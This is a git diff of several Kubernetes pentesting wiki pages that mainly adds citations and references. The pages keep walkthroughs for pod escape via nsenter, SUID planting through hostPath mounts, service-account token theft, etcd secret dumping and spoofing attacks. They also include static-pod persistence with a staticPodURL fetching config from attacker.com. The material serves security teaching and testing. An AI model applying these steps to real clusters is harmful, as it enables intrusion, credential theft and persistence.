+- [41] [Bishop Fox badPods](https://github.com/BishopFox/badPods)
+- [42] [Managing Service Accounts](https://kubernetes.io/docs/reference/access-authn-authz/service-accounts-admin/)
+- [43] [capabilities(7)](https://man7.org/linux/man-pages/man7/capabilities.7.html)
+- [44] [ipc_namespaces(7)](https://www.man7.org/linux/man-pages/man7/ipc_namespaces.7.html)
+- [45] [network_namespaces(7)](https://www.man7.org/linux/man-pages/man7/network_namespaces.7.html)
+- [46] [pid_namespaces(7)](https://man7.org/linux/man-pages/man7/pid_namespaces.7.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-

--- a/src/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.md
+++ b/src/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.md
@@ -13,12 +13,14 @@ We are going to create:
 - **Permissions** to list and **create** pods to a user called "**Test**" will be given
   - A Role "test-r" and RoleBinding "test-rb" will be created
 - Then we will **confirm** that the SA can list secrets and that the user Test can list a pods
-- Finally we will **impersonate the user Test** to **create a pod** that includes the **SA test-sa** and **steal** the service account **token.**
+- Finally we will **impersonate the user Test** to **create a pod** that includes the **SA test-sa** and **steal** the service account **token.**<sup>[[1]](#references)[[3]](#references)</sup>
   - This is the way yo show the user could escalate privileges this way
 
 > [!NOTE]
 > To create the scenario an admin account is used.\
-> Moreover, to **exfiltrate the sa token** in this example the **admin account is used** to exec inside the created pod. However, **as explained here**, the **declaration of the pod could contain the exfiltration of the token**, so the "exec" privilege is not necesario to exfiltrate the token, the **"create" permission is enough**.
+> Moreover, to **exfiltrate the sa token** in this example the **admin account is used** to exec inside the created pod. However, **as explained here**, the **declaration of the pod could contain the exfiltration of the token**, so the "exec" privilege is not necesario to exfiltrate the token, the **"create" permission is enough**.<sup>[[1]](#references)[[3]](#references)</sup>
+
+All `kubectl --as ...` calls below require the authenticated caller to be authorized to impersonate the selected user or service account; `--as` changes the request identity rather than authenticating as that principal.<sup>[[4]](#references)</sup>
 
 ```bash
 # Create Service Account test-sa
@@ -110,7 +112,11 @@ kubectl delete role test-r
 kubectl delete serviceaccount test-sa
 ```
 
+Modern Kubernetes clusters mount a short-lived, automatically rotating ServiceAccount token at this path. The command above prints part of that JWT for the lab; treat it as a credential and do not rely on it as a durable token.<sup>[[3]](#references)[[6]](#references)</sup>
+
 ## Create Daemonset
+
+A DaemonSet uses a Pod-shaped template, and its controller creates a Pod for each eligible node. Setting `serviceAccountName` in that template gives the resulting Pods the selected ServiceAccount identity.<sup>[[3]](#references)[[5]](#references)</sup>
 
 ```bash
 # Create Service Account test-sa
@@ -210,9 +216,9 @@ kubectl delete serviceaccount test-sa
 
 ### Patch Daemonset
 
-In this case we are going to **patch a daemonset** to make its pod load our desired service account.
+In this case we are going to **patch a daemonset** to make its pod load our desired service account.<sup>[[3]](#references)[[5]](#references)</sup>
 
-If your user has the **verb update instead of patch, this won't work**.
+If your user has the **verb update instead of patch, this won't work**: Kubernetes authorizes `PUT` as `update` and `PATCH` as `patch`.<sup>[[1]](#references)</sup>
 
 ```bash
 # Create Service Account test-sa
@@ -331,6 +337,8 @@ kubectl delete serviceaccount test-sa
 
 ## Doesn't work
 
+These failed cases illustrate Kubernetes RBAC's API-level privilege checks: creating or updating a role requires the role's permissions or explicit `escalate`, while creating or updating a binding requires the referenced role's permissions or explicit `bind` at the relevant scope.<sup>[[2]](#references)</sup>
+
 ### Create/Patch Bindings
 
 **Doesn't work:**
@@ -423,8 +431,10 @@ kubectl delete serviceaccount test-sa2
 
 ### Bind explicitly Bindings
 
-In the "Privilege Escalation Prevention and Bootstrapping" section of [https://unofficial-kubernetes.readthedocs.io/en/latest/admin/authorization/rbac/](https://unofficial-kubernetes.readthedocs.io/en/latest/admin/authorization/rbac/) it's mentioned that if a SA can create a Binding and has explicitly Bind permissions over the Role/Cluster role, it can create bindings even using Roles/ClusterRoles with permissions that it doesn't have.\
+In the "Privilege Escalation Prevention and Bootstrapping" section of [https://unofficial-kubernetes.readthedocs.io/en/latest/admin/authorization/rbac/](https://unofficial-kubernetes.readthedocs.io/en/latest/admin/authorization/rbac/) it's mentioned that if a SA can create a Binding and has explicitly Bind permissions over the Role/Cluster role, it can create bindings even using Roles/ClusterRoles with permissions that it doesn't have.<sup>[[2]](#references)[[7]](#references)</sup>\
 However, it didn't work for me:
+
+The manifests below intentionally preserve that failed experiment. Their `apiGroups: ["rbac.authorization.k8s.io/v1"]` entries use an API version where Kubernetes expects the RBAC API group (`rbac.authorization.k8s.io`), so they do not grant the intended `bind` permission; the `/v1` suffix belongs in `apiVersion`.<sup>[[2]](#references)</sup>
 
 ```yaml
 # Create 2 SAs, give one of them permissions to create clusterrolebindings
@@ -560,7 +570,7 @@ kubectl delete serviceaccount test-sa2
 
 ### Arbitrary roles creation
 
-In this example we try to create a role having the permissions create and path over the roles resources. However, K8s prevent us from creating a role with more permissions the principal creating is has:
+In this example we try to create a role having the permissions `create` and `patch` over the `roles` resource. However, Kubernetes prevents us from creating a role with more permissions than the principal creating it has:<sup>[[2]](#references)</sup>
 
 ```yaml
 # Create a SA and give the permissions "create" and "patch" over "roles"
@@ -609,7 +619,14 @@ kubectl delete role test-r2
 kubectl delete serviceaccount test-sa
 ```
 
+## References
+
+- [1] [Authorization | Kubernetes](https://kubernetes.io/docs/reference/access-authn-authz/authorization/)
+- [2] [Using RBAC Authorization | Kubernetes](https://kubernetes.io/docs/reference/access-authn-authz/rbac/)
+- [3] [Service Accounts | Kubernetes](https://kubernetes.io/docs/concepts/security/service-accounts/)
+- [4] [User Impersonation | Kubernetes](https://kubernetes.io/docs/reference/access-authn-authz/user-impersonation/)
+- [5] [DaemonSet | Kubernetes](https://kubernetes.io/docs/concepts/workloads/controllers/daemonset/)
+- [6] [Accessing the Kubernetes API from a Pod | Kubernetes](https://kubernetes.io/docs/tasks/run-application/access-api-from-pod/)
+- [7] [Using RBAC Authorization (archived mirror)](https://unofficial-kubernetes.readthedocs.io/en/latest/admin/authorization/rbac/)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md
+++ b/src/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md
@@ -4,16 +4,16 @@
 
 ## Privileged and hostPID
 
-With these privileges you will have **access to the hosts processes** and **enough privileges to enter inside the namespace of one of the host processes**.\
-Note that you can potentially not need privileged but just some capabilities and other potential defenses bypasses (like apparmor and/or seccomp).
+With these privileges you will have **access to the hosts processes** and **enough privileges to enter inside the namespace of one of the host processes**.<sup>[[1]](#references)[[2]](#references)</sup>\
+Note that you can potentially not need privileged but just some capabilities and other potential defenses bypasses (like apparmor and/or seccomp).<sup>[[3]](#references)</sup>
 
-Just executing something like the following will allow you to escape from the pod:
+Just executing something like the following will allow you to escape from the pod:<sup>[[1]](#references)[[2]](#references)</sup>
 
 ```bash
 nsenter --target 1 --mount --uts --ipc --net --pid -- bash
 ```
 
-Configuration example:
+Configuration example:<sup>[[1]](#references)[[2]](#references)</sup>
 
 ```yaml
 apiVersion: v1
@@ -46,7 +46,11 @@ spec:
   #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
 ```
 
+## References
+
+- [1] [Pod | Kubernetes API Reference](https://kubernetes.io/docs/reference/kubernetes-api/core/pod-v1/)
+- [2] [nsenter(1) - Linux manual page](https://man7.org/linux/man-pages/man1/nsenter.1.html)
+- [3] [Linux kernel security constraints for Pods and containers | Kubernetes](https://kubernetes.io/docs/concepts/security/linux-kernel-security-constraints/)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
 

--- a/src/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md
+++ b/src/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md
@@ -24,12 +24,12 @@ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-secu
 
 ### Abusing writable hostPath/bind mounts (container -> host root via SUID planting)
 
-If a compromised pod/container has a writable volume that maps directly to the host filesystem (Kubernetes hostPath or Docker bind mount), and you can become root inside the container, you can leverage the mount to create a setuid-root binary on the host and then execute it from the host to pop root.
+If a compromised pod/container has a writable volume that maps directly to the host filesystem (Kubernetes hostPath or Docker bind mount), and you can become root inside the container, you can leverage the mount to create a setuid-root binary on the host and then execute it from the host to pop root.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
 
 Key conditions:
-- The mounted volume is writable from inside the container (readOnly: false and filesystem permissions allow write).
-- The host filesystem backing the mount is not mounted with the nosuid option.
-- You have some way to execute the planted binary on the host (for example, separate SSH/RCE on host, a user on the host can execute it, or another vector that runs binaries from that path).
+- The mounted volume is writable from inside the container (readOnly: false and filesystem permissions allow write).<sup>[[2]](#references)[[3]](#references)</sup>
+- The host filesystem backing the mount is not mounted with the nosuid option.<sup>[[5]](#references)</sup>
+- You have some way to execute the planted binary on the host (for example, separate SSH/RCE on host, a user on the host can execute it, or another vector that runs binaries from that path).<sup>[[1]](#references)</sup>
 
 How to identify writable hostPath/bind mounts:
 - With kubectl, check for hostPath volumes: kubectl get pod <pod> -o jsonpath='{.spec.volumes[*].hostPath.path}'
@@ -67,10 +67,12 @@ ls -l /opt/limesurvey/suidbash
 /opt/limesurvey/suidbash -p   # -p preserves effective UID 0 in bash
 ```
 
+Bash's privileged `-p` option prevents Bash from resetting the effective UID when the effective and real UIDs differ.<sup>[[4]](#references)</sup>
+
 Notes and troubleshooting:
-- If the host mount has nosuid, setuid bits will be ignored. Check mount options on the host (cat /proc/mounts | grep <mountpoint>) and look for nosuid.
+- If the host mount has nosuid, setuid bits will be ignored. Check mount options on the host (cat /proc/mounts | grep <mountpoint>) and look for nosuid.<sup>[[5]](#references)</sup>
 - If you cannot get a host execution path, similar writable mounts can be abused to write other persistence/priv-esc artifacts on the host if the mapped directory is security-critical (e.g., add a root SSH key if the mount maps into /root/.ssh, drop a cron/systemd unit if maps into /etc, replace a root-owned binary in PATH that the host will execute, etc.). Feasibility depends entirely on what path is mounted.
-- This technique also works with plain Docker bind mounts; in Kubernetes it’s typically a hostPath volume (readOnly: false) or an incorrectly scoped subPath.
+- This technique also works with plain Docker bind mounts; in Kubernetes it’s typically a hostPath volume (readOnly: false) or an incorrectly scoped subPath.<sup>[[2]](#references)[[3]](#references)</sup>
 
 ### Abusing Kubernetes Privileges
 
@@ -80,7 +82,7 @@ As explained in the section about **kubernetes enumeration**:
 kubernetes-enumeration.md
 {{#endref}}
 
-Usually the pods are run with a **service account token** inside of them. This service account may have some **privileges attached to it** that you could **abuse** to **move** to other pods or even to **escape** to the nodes configured inside the cluster. Check how in:
+Usually the pods are run with a **service account token** inside of them. This service account may have some **privileges attached to it** that you could **abuse** to **move** to other pods or even to **escape** to the nodes configured inside the cluster.<sup>[[14]](#references)</sup> Check how in:
 
 {{#ref}}
 abusing-roles-clusterroles-in-kubernetes/
@@ -102,11 +104,11 @@ As you are inside the Kubernetes environment, if you cannot escalate privileges 
 kubectl get svc --all-namespaces
 ```
 
-By default, Kubernetes uses a flat networking schema, which means **any pod/service within the cluster can talk to other**. The **namespaces** within the cluster **don't have any network security restrictions by default**. Anyone in the namespace can talk to other namespaces.
+By default, Kubernetes pods are not isolated for ingress or egress. Without NetworkPolicies, all ingress and egress traffic to and from pods in a namespace is allowed; cross-namespace access and service reachability still depend on the CNI and policy configuration.<sup>[[7]](#references)</sup>
 
 ### Scanning
 
-The following Bash script (taken from a [Kubernetes workshop](https://github.com/calinah/learn-by-hacking-kccn/blob/master/k8s_cheatsheet.md)) will install and scan the IP ranges of the kubernetes cluster:
+The following Bash script (taken from a [Kubernetes workshop](https://github.com/calinah/learn-by-hacking-kccn/blob/master/k8s_cheatsheet.md)) will install and scan the IP ranges of the kubernetes cluster:<sup>[[12]](#references)</sup>
 
 ```bash
 sudo apt-get update
@@ -139,8 +141,11 @@ In case the **compromised pod is running some sensitive service** where other po
 
 ## Network Spoofing
 
-By default techniques like **ARP spoofing** (and thanks to that **DNS Spoofing**) work in kubernetes network. Then, inside a pod, if you have the **NET_RAW capability** (which is there by default), you will be able to send custom crafted network packets and perform **MitM attacks via ARP Spoofing to all the pods running in the same node.**\
-Moreover, if the **malicious pod** is running in the **same node as the DNS Server**, you will be able to perform a **DNS Spoofing attack to all the pods in cluster**.
+By default techniques like **ARP spoofing** (and thanks to that **DNS Spoofing**) work in kubernetes network. Then, inside a pod, if you have the **NET_RAW capability** (which is there by default), you will be able to send custom crafted network packets and perform **MitM attacks via ARP Spoofing to all the pods running in the same node.**<sup>[[27]](#references)[[28]](#references)</sup>\
+Moreover, if the **malicious pod** is running in the **same node as the DNS Server**, you will be able to perform a **DNS Spoofing attack to all the pods in cluster**.<sup>[[27]](#references)[[28]](#references)</sup>
+
+> [!NOTE]
+> The original technique depends on the active CNI and pod network topology. Some CNIs filter spoofed source MAC/IP values or isolate same-node traffic, and dropping `NET_RAW` prevents raw packet crafting; validate the network path and capability set before assuming the attack works.<sup>[[7]](#references)[[8]](#references)[[28]](#references)</sup>
 
 {{#ref}}
 kubernetes-network-attacks.md
@@ -148,9 +153,9 @@ kubernetes-network-attacks.md
 
 ## Node DoS
 
-There is no specification of resources in the Kubernetes manifests and **not applied limit** ranges for the containers. As an attacker, we can **consume all the resources where the pod/deployment running** and starve other resources and cause a DoS for the environment.
+Kubernetes containers are unbounded by default when manifests do not specify resource requests/limits and the namespace does not apply a LimitRange. As an attacker, we can **consume all the resources where the pod/deployment running** and starve other resources and cause a DoS for the environment.<sup>[[9]](#references)[[10]](#references)</sup>
 
-This can be done with a tool such as [**stress-ng**](https://zoomadmin.com/HowToInstall/UbuntuPackage/stress-ng):
+This can be done with a tool such as [**stress-ng**](https://zoomadmin.com/HowToInstall/UbuntuPackage/stress-ng):<sup>[[11]](#references)</sup>
 
 ```
 stress-ng --vm 2 --vm-bytes 2G --timeout 30s
@@ -187,9 +192,9 @@ If you managed to **escape from the container** there are some interesting thing
 
 ### Image Pull and Registry Credentials
 
-After node access, also review how the node pulls private images. Useful evidence includes runtime image metadata (`crictl images`), Pod or ServiceAccount `imagePullSecrets`, containerd registry configuration such as `/etc/containerd/config.toml` and `/etc/containerd/certs.d`, and kubelet image credential provider flags such as `--image-credential-provider-config` and `--image-credential-provider-bin-dir`.
+After node access, also review how the node pulls private images. Useful evidence includes runtime image metadata (`crictl images`), Pod or ServiceAccount `imagePullSecrets`, containerd registry configuration such as `/etc/containerd/config.toml` and `/etc/containerd/certs.d`, and kubelet image credential provider flags such as `--image-credential-provider-config` and `--image-credential-provider-bin-dir`.<sup>[[15]](#references)[[16]](#references)[[17]](#references)</sup>
 
-Do not assume that a cached private image means you have reusable registry credentials. It might only prove that the image exists on this node. However, static runtime registry credentials, Docker config JSON pull secrets, or a credential provider that can mint short-lived pull credentials can expose private registry access. Recent Kubernetes versions also support service-account-token based kubelet credential providers for image pulls, so check whether the provider is using Pod-bound service account tokens and which audience it requests before reporting the impact.
+Do not assume that a cached private image means you have reusable registry credentials. It might only prove that the image exists on this node. However, static runtime registry credentials, Docker config JSON pull secrets, or a credential provider that can mint short-lived pull credentials can expose private registry access. Recent Kubernetes versions also support service-account-token based kubelet credential providers for image pulls, so check whether the provider is using Pod-bound service account tokens and which audience it requests before reporting the impact.<sup>[[15]](#references)[[16]](#references)[[17]](#references)</sup>
 
 ### Find node kubeconfig
 
@@ -223,7 +228,7 @@ for i in $(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1
 done
 ```
 
-The script [**can-they.sh**](https://github.com/BishopFox/badPods/blob/main/scripts/can-they.sh) will automatically **get the tokens of other pods and check if they have the permission** you are looking for (instead of you looking 1 by 1):
+The script [**can-they.sh**](https://github.com/BishopFox/badPods/blob/main/scripts/can-they.sh) will automatically **get the tokens of other pods and check if they have the permission** you are looking for (instead of you looking 1 by 1):<sup>[[13]](#references)</sup>
 
 ```bash
 ./can-they.sh -i "--list -n default"
@@ -246,7 +251,7 @@ kubernetes-pivoting-to-clouds.md
 
 ### Steal etcd
 
-If you can specify the [**nodeName**](https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes/#create-a-pod-that-gets-scheduled-to-specific-node) of the Node that will run the container, get a shell inside a control-plane node and get the **etcd database**:
+If you can specify the [**nodeName**](https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes/#create-a-pod-that-gets-scheduled-to-specific-node) of the Node that will run the container, get a shell inside a control-plane node and get the **etcd database**:<sup>[[18]](#references)</sup>
 
 ```
 kubectl get nodes
@@ -261,7 +266,7 @@ control-plane nodes have the **role master** and in **cloud managed clusters you
 
 If you can run your pod on a control-plane node using the `nodeName` selector in the pod spec, you might have easy access to the `etcd` database, which contains all of the configuration for the cluster, including all secrets.
 
-Below is a quick and dirty way to grab secrets from `etcd` if it is running on the control-plane node you are on. If you want a more elegant solution that spins up a pod with the `etcd` client utility `etcdctl` and uses the control-plane node's credentials to connect to etcd wherever it is running, check out [this example manifest](https://github.com/mauilion/blackhat-2019/blob/master/etcd-attack/etcdclient.yaml) from @mauilion.
+Below is a quick and dirty way to grab secrets from `etcd` if it is running on the control-plane node you are on. If you want a more elegant solution that spins up a pod with the `etcd` client utility `etcdctl` and uses the control-plane node's credentials to connect to etcd wherever it is running, check out [this example manifest](https://github.com/mauilion/blackhat-2019/blob/master/etcd-attack/etcdclient.yaml) from @mauilion.<sup>[[19]](#references)</sup>
 
 **Check to see if `etcd` is running on the control-plane node and see where the database is (This is on a `kubeadm` created cluster)**
 
@@ -301,13 +306,15 @@ Output:
 
 #### Read secrets from etcd 2 [from here](https://www.linkedin.com/posts/grahamhelton_want-to-hack-kubernetes-here-is-a-cheatsheet-activity-7241139106708164608-hLAC/?utm_source=share&utm_medium=member_android)
 
-1. Create a snapshot of the **`etcd`** database. Check [**this script**](https://gist.github.com/grahamhelton/0740e1fc168f241d1286744a61a1e160) for further info.
+1. Create a snapshot of the **`etcd`** database. Check [**this script**](https://gist.github.com/grahamhelton/0740e1fc168f241d1286744a61a1e160) for further info.<sup>[[20]](#references)[[21]](#references)[[22]](#references)</sup>
 2. Transfer the **`etcd`** snapshot out of the node in your favourite way.
 3. Unpack the database:
 
 ```bash
 mkdir -p restore ; etcdutl snapshot restore etcd-loot-backup.db \ --data-dir ./restore
 ```
+
+The current etcd recovery workflow uses `etcdutl snapshot restore` with a data directory, as in the command above.<sup>[[20]](#references)</sup>
 
 4. Start **`etcd`** on your local machine and make it use the stolen snapshot:
 
@@ -316,13 +323,15 @@ etcd \ --data-dir=./restore \ --initial-cluster=state=existing \ --snapshot='./e
 
 ```
 
+On current etcd releases, start `etcd` against the restored data directory; the `--snapshot` example above is from the linked older write-up and may not be accepted by the current `etcd` binary.<sup>[[20]](#references)</sup>
+
 5. List all the secrets:
 
 ```bash
 etcdctl get "" --prefix --keys-only | grep secret
 ```
 
-6. Get the secfrets:
+6. Get the secfrets:<sup>[[20]](#references)[[22]](#references)</sup>
 
 ```bash
  etcdctl get /registry/secrets/default/my-secret
@@ -330,27 +339,27 @@ etcdctl get "" --prefix --keys-only | grep secret
 
 ### Static/Mirrored Pods Persistence
 
-_Static Pods_ are managed directly by the kubelet daemon on a specific node, without the API server observing them. Unlike Pods that are managed by the control plane (for example, a Deployment); instead, the **kubelet watches each static Pod** (and restarts it if it fails).
+_Static Pods_ are managed directly by the kubelet daemon on a specific node, without the API server observing them. Unlike Pods that are managed by the control plane (for example, a Deployment); instead, the **kubelet watches each static Pod** (and restarts it if it fails).<sup>[[23]](#references)</sup>
 
 Therefore, static Pods are always **bound to one Kubelet** on a specific node.
 
-The **kubelet automatically tries to create a mirror Pod on the Kubernetes API server** for each static Pod. This means that the Pods running on a node are visible on the API server, but cannot be controlled from there. The Pod names will be suffixed with the node hostname with a leading hyphen.
+The **kubelet automatically tries to create a mirror Pod on the Kubernetes API server** for each static Pod. This means that the Pods running on a node are visible on the API server, but cannot be controlled from there. The Pod names will be suffixed with the node hostname with a leading hyphen.<sup>[[23]](#references)</sup>
 
 > [!CAUTION]
-> The **`spec` of a static Pod cannot refer to other API objects** (e.g., ServiceAccount, ConfigMap, Secret, etc. So **you cannot abuse this behaviour to launch a pod with an arbitrary serviceAccount** in the current node to compromise the cluster. But you could use this to run pods in different namespaces (in case thats useful for some reason).
+> The **`spec` of a static Pod cannot refer to other API objects** (e.g., ServiceAccount, ConfigMap, Secret, etc. So **you cannot abuse this behaviour to launch a pod with an arbitrary serviceAccount** in the current node to compromise the cluster. But you could use this to run pods in different namespaces (in case thats useful for some reason).<sup>[[23]](#references)</sup>
 
 If you are inside the node host you can make it create a **static pod inside itself**. This is pretty useful because it might allow you to **create a pod in a different namespace** like **kube-system**.
 
 In order to create a static pod, the [**docs are a great help**](https://kubernetes.io/docs/tasks/configure-pod-container/static-pod/). You basically need 2 things:
 
-- Configure the param **`--pod-manifest-path=/etc/kubernetes/manifests`** in the **kubelet service**, or in the **kubelet config** ([**staticPodPath**](https://kubernetes.io/docs/reference/config-api/kubelet-config.v1beta1/index.html#kubelet-config-k8s-io-v1beta1-KubeletConfiguration)) and restart the service
-- Create the definition on the **pod definition** in **`/etc/kubernetes/manifests`**
+- Configure the param **`--pod-manifest-path=/etc/kubernetes/manifests`** in the **kubelet service**, or in the **kubelet config** ([**staticPodPath**](https://kubernetes.io/docs/reference/config-api/kubelet-config.v1beta1/index.html#kubelet-config-k8s-io-v1beta1-KubeletConfiguration)) and restart the service.<sup>[[23]](#references)[[24]](#references)</sup>
+- Create the definition on the **pod definition** in **`/etc/kubernetes/manifests`**.<sup>[[23]](#references)</sup>
 
 **Another more stealth way would be to:**
 
-- Modify the param **`staticPodURL`** from **kubelet** config file and set something like `staticPodURL: http://attacker.com:8765/pod.yaml`. This will make the kubelet process create a **static pod** getting the **configuration from the indicated URL**.
+- Modify the param **`staticPodURL`** from **kubelet** config file and set something like `staticPodURL: http://attacker.com:8765/pod.yaml`. This will make the kubelet process create a **static pod** getting the **configuration from the indicated URL**.<sup>[[23]](#references)[[24]](#references)</sup>
 
-**Example** of **pod** configuration to create a privilege pod in **kube-system** taken from [**here**](https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/):
+**Example** of **pod** configuration to create a privilege pod in **kube-system** taken from [**here**](https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/):<sup>[[25]](#references)[[29]](#references)</sup>
 
 ```yaml
 apiVersion: v1
@@ -385,7 +394,7 @@ For [**more info follow this links**](abusing-roles-clusterroles-in-kubernetes/i
 
 ## Automatic Tools
 
-- [**https://github.com/inguardians/peirates**](https://github.com/inguardians/peirates)
+- [**https://github.com/inguardians/peirates**](https://github.com/inguardians/peirates)<sup>[[6]](#references)</sup>
 
 ```
 Peirates v1.1.8-beta by InGuardians
@@ -447,17 +456,38 @@ Off-Menu         +
 [exit] Exit Peirates
 ```
 
-- [**https://github.com/r0binak/MTKPI**](https://github.com/r0binak/MTKPI)
+- [**https://github.com/r0binak/MTKPI**](https://github.com/r0binak/MTKPI)<sup>[[26]](#references)</sup>
 
 ## References
 
-- [Forgotten (HTB) - Writable bind mount SUID planting](https://0xdf.gitlab.io/2025/09/16/htb-forgotten.html)
-- [Kubernetes hostPath volume](https://kubernetes.io/docs/concepts/storage/volumes/#hostpath)
-- [Docker bind mounts](https://docs.docker.com/storage/bind-mounts/)
-- [Bash -p (preserve privileges)](https://www.gnu.org/software/bash/manual/bash.html#Invoking-Bash)
-- [mount(8) nosuid option](https://man7.org/linux/man-pages/man8/mount.8.html)
-- [Peirates (Kubernetes attack tool)](https://github.com/inguardians/peirates)
+- [1] [Forgotten (HTB) - Writable bind mount SUID planting](https://0xdf.gitlab.io/2025/09/16/htb-forgotten.html)
+- [2] [Kubernetes hostPath volume](https://kubernetes.io/docs/concepts/storage/volumes/#hostpath)
+- [3] [Docker bind mounts](https://docs.docker.com/storage/bind-mounts/)
+- [4] [Bash -p (preserve privileges)](https://www.gnu.org/software/bash/manual/bash.html#Invoking-Bash)
+- [5] [mount(8) nosuid option](https://man7.org/linux/man-pages/man8/mount.8.html)
+- [6] [Peirates (Kubernetes attack tool)](https://github.com/inguardians/peirates)
+- [7] [Network Policies | Kubernetes](https://kubernetes.io/docs/concepts/services-networking/network-policies/)
+- [8] [Runtime privilege and Linux capabilities | Docker Docs](https://docs.docker.com/engine/containers/run/#runtime-privilege-and-linux-capabilities)
+- [9] [Resource Management for Pods and Containers | Kubernetes](https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/)
+- [10] [Limit Ranges | Kubernetes](https://kubernetes.io/docs/concepts/policy/limit-range/)
+- [11] [stress-ng](https://github.com/ColinIanKing/stress-ng)
+- [12] [Kubernetes cheatsheet | learn-by-hacking-kccn](https://github.com/calinah/learn-by-hacking-kccn/blob/master/k8s_cheatsheet.md)
+- [13] [can-they.sh | Bishop Fox badPods](https://github.com/BishopFox/badPods/blob/main/scripts/can-they.sh)
+- [14] [Service Accounts | Kubernetes](https://kubernetes.io/docs/concepts/security/service-accounts/)
+- [15] [Pull an Image from a Private Registry | Kubernetes](https://kubernetes.io/docs/tasks/configure-pod-container/pull-image-private-registry/)
+- [16] [Configure a kubelet image credential provider | Kubernetes](https://kubernetes.io/docs/tasks/administer-cluster/kubelet-credential-provider/)
+- [17] [Registry | containerd](https://github.com/containerd/containerd/blob/main/docs/cri/registry.md)
+- [18] [Assign Pods to Nodes | Kubernetes](https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes/#create-a-pod-that-gets-scheduled-to-specific-node)
+- [19] [etcd client example manifest | mauilion](https://github.com/mauilion/blackhat-2019/blob/master/etcd-attack/etcdclient.yaml)
+- [20] [Disaster recovery | etcd](https://etcd.io/docs/v3.5/op-guide/recovery/)
+- [21] [Kubernetes etcd snapshot script | Graham Helton](https://gist.github.com/grahamhelton/0740e1fc168f241d1286744a61a1e160)
+- [22] [How to hack Kubernetes cluster secrets | Graham Helton](https://www.linkedin.com/posts/grahamhelton_want-to-hack-kubernetes-here-is-a-cheatsheet-activity-7241139106708164608-hLAC/?utm_source=share&utm_medium=member_android)
+- [23] [Create static Pods | Kubernetes](https://kubernetes.io/docs/tasks/configure-pod-container/static-pod/)
+- [24] [Kubelet Configuration (v1beta1) | Kubernetes](https://kubernetes.io/docs/reference/config-api/kubelet-config.v1beta1/index.html#kubelet-config-k8s-io-v1beta1-KubeletConfiguration)
+- [25] [Deep Dive into Real-World Kubernetes Threats | NCC Group](https://www.nccgroup.com/research/deep-dive-into-real-world-kubernetes-threats/)
+- [26] [MTKPI - Multi Tool Kubernetes Pentest Image](https://github.com/r0binak/MTKPI)
+- [27] [Attacking Kubernetes Clusters Through Your Network Plumbing: Part 1 | CyberArk](https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1)
+- [28] [DNS Spoofing on Kubernetes Clusters | Aqua](https://www.aquasec.com/blog/dns-spoofing-kubernetes-clusters/)
+- [29] [Command and kubectl talk follow-up | NCC Group](https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-

--- a/src/pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.md
+++ b/src/pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.md
@@ -2,7 +2,7 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-There are **different ways to expose services** in Kubernetes so both **internal** endpoints and **external** endpoints can access them. This Kubernetes configuration is pretty critical as the administrator could give access to **attackers to services they shouldn't be able to access**.
+There are **different ways to expose services** in Kubernetes so both **internal** endpoints and **external** endpoints can access them.<sup>[[2]](#references)</sup> This Kubernetes configuration is pretty critical as the administrator could give access to **attackers to services they shouldn't be able to access**.
 
 ### Automatic Enumeration
 
@@ -22,19 +22,19 @@ done | grep -v "ClusterIP"
 
 ### ClusterIP
 
-A **ClusterIP** service is the **default** Kubernetes **service**. It gives you a **service inside** your cluster that other apps inside your cluster can access. There is **no external access**.
+A **ClusterIP** service is the **default** Kubernetes **service**. It gives you a **service inside** your cluster that other apps inside your cluster can access. There is **no external access**.<sup>[[2]](#references)</sup>
 
-However, this can be accessed using the Kubernetes Proxy:
+However, this can be accessed using the Kubernetes Proxy:<sup>[[13]](#references)[[1]](#references)</sup>
 
 ```bash
 kubectl proxy --port=8080
 ```
 
-Now, you can navigate through the Kubernetes API to access services using this scheme:
+Now, you can navigate through the Kubernetes API to access services using this scheme:<sup>[[13]](#references)[[1]](#references)</sup>
 
 `http://localhost:8080/api/v1/proxy/namespaces/<NAMESPACE>/services/<SERVICE-NAME>:<PORT-NAME>/`
 
-For example you could use the following URL:
+For example you could use the following URL:<sup>[[13]](#references)[[1]](#references)</sup>
 
 `http://localhost:8080/api/v1/proxy/namespaces/default/services/my-internal-service:http/`
 
@@ -56,7 +56,7 @@ spec:
       protocol: TCP
 ```
 
-_This method requires you to run `kubectl` as an **authenticated user**._
+_This method requires you to run `kubectl` as an **authenticated user**._<sup>[[13]](#references)[[1]](#references)</sup>
 
 List all ClusterIPs:
 
@@ -66,7 +66,7 @@ kubectl get services --all-namespaces -o=custom-columns='NAMESPACE:.metadata.nam
 
 ### NodePort
 
-When **NodePort** is utilised, a designated port is made available on all Nodes (representing the Virtual Machines). **Traffic** directed to this specific port is then systematically **routed to the service**. Typically, this method is not recommended due to its drawbacks.
